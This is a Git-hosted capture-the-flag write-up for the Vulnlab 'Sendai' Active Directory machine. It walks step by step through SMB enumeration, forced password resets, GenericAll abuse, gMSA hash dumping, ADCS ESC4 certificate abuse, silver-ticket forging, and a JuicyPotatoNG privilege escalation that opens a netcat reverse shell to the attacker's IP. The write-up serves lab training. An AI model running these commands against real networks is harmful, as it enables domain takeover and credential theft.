Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity

Create Sendai.vl

Browse source
This commit is contained in:
ARZ 2024-05-11 00:11:27 +03:00 committed by GitHub
parent c8d540ac48
commit 4d37a95171
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 221 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

221
Vulnlab/Sendai.vl Normal file
View file

@ -0,0 +1,221 @@
# Vulnlab - Sendai
```bash
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown
```
## PORT 80/443
<img src="https://i.imgur.com/2xyBd1B.png"/>
Running gobuster, we can find `/service`
<img src="https://i.imgur.com/41s7K0i.png"/>
However this endpoints shows that we don't have access to it
<img src="https://i.imgur.com/YgAmiLH.png"/>
## PORT 445
Enumerating smb shares with anonymous login, we'll see `config`, `sendai` and `Users` share, where config was not accessible, Users didn't anything but sendai had some interesting files
<img src="https://i.imgur.com/mQaCMNk.png"/>
<img src="https://i.imgur.com/OjZZNAR.png"/>
<img src="https://i.imgur.com/kSTgBfG.png"/>
The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user's directories
<img src="https://i.imgur.com/Ob5kSkE.png"/>
## Resetting domain user's password
These users can also be enumerated through `lookupsid` by brute forcing sids
<img src="https://i.imgur.com/cNM7HDk.png"/>
On trying to login with null password, we'll get two users with password to be changed
<img src="https://i.imgur.com/bWjdAf4.png"/>
Password can be changed with `impacket-smbpasswd`
```bash
impacket-smbpasswd sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'
```
<img src="https://i.imgur.com/2naixZH.png"/>
<img src="https://i.imgur.com/3NWYOCE.png"/>
From config share, we can grab `.sqlconfig` having credentials to MSSQL
<img src="https://i.imgur.com/iOaiZ2c.png"/>
<img src="https://i.imgur.com/oQ0cAH9.png"/>
But this service isn't exposed to us so moving on to enumerating the domain with bloodhound
```bash
python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41
```
<img src="https://i.imgur.com/JM5mhTv.png"/>
Thomas.Powell is a member of `Support` group has `GenericAll` on `ADMSVC` group which has `ReadGMSAPassword` on `MGTSVC$` account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account
<img src="https://i.imgur.com/BRPHbql.png"/>
## Abusing GenericAll and reading GMSA password
Through` bloodyAD` we can add thomas in ADMSVC group having genericall rights
```bash
python3 bloodyAD.py --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell
```
<img src="https://i.imgur.com/cS1zoYy.png"/>
With gmsadumper script or with netexec we can dump the nthash of mgtsvc account
```bash
python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41
```
<img src="https://i.imgur.com/ina1lCb.png"/>
This account can login on DC as it's part of `Remote Management` group
<img src="https://i.imgur.com/uwRvgKc.png"/>
Checking the privileges after logging in through evil-winrm, it doesn't have any privilege that we can abuse to get local admin
<img src="https://i.imgur.com/jxAX90R.png"/>
## Obtaining clifford's password
From the running process, we have helpdesk which doesn't normally run on a system
<img src="https://i.imgur.com/IxlngBF.png"/>
Enumerating the system with `PrivescCheck.ps1`
<img src="https://i.imgur.com/yO9Rckp.png"/>
This will list down the running processes from where we'll find the clifford.davey's creds
<img src="https://i.imgur.com/NPt3pB3.png|"/>
## Enumerating ADCS
This user belongs to `CA-Operators` group, so this likely will be able to enroll in a custom template, enumerating templates with `certipy`
<img src="https://i.imgur.com/Vgev4wX.png"/>
## Escalating privileges through ESC4
```bash
certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout
```
This lists down a template `SendaiComputer` which has EKU set to `Client Authentication` that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse
<img src="https://i.imgur.com/mQUF4HH.png"/>
<img src="https://i.imgur.com/A10lXkN.png"/>
With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user
```bash
certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
```
<img src="https://i.imgur.com/YycVHAi.png"/>
<img src="https://i.imgur.com/FEVEUWg.png"/>
```bash
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
```
<img src="https://i.imgur.com/pCSgIFn.png"/>
```bash
certipy auth -pfx ./administrator.pfx -domain sendai.vl
```
<img src="https://i.imgur.com/vgGRaVx.png"/>
## Escalating with SeImpersonate privilege
Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward with`chisel`
```bash
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks
```
<img src="https://i.imgur.com/hSVXA3l.png"/>
But we'll get login denied for sqlsvc account
<img src="https://i.imgur.com/7dUxhoi.png"/>
With `ticketer,` forging a silver ticket for accessing MSSQL service as an administrator
```bash
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator
```
<img src="https://i.imgur.com/iOKxMa4.png"/>
<img src="https://i.imgur.com/ZlBgszU.png"/>
Enabling `xp_cmdshell` which will allow us to execute system commands as sqlsvc
<img src="https://i.imgur.com/DDGiMXV.png"/>
The difference here is that we'll have `SeImpersonate` privilege, which can abuse to get local admin
<img src="https://i.imgur.com/CvG90gg.png"/>
<img src="https://i.imgur.com/tdEDy5t.png"/>
Using `juicypotato-ng` to abuse the privilege and get a shell a SYSTEM
```bash
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"
```
<img src="https://i.imgur.com/22805js.png"/>
# References
- https://exploit-notes.hdks.org/exploit/windows/active-directory/smb-pentesting/
- https://github.com/itm4n/PrivescCheck
- https://hideandsec.sh/books/cheatsheets-82c/page/active-directory-certificate-services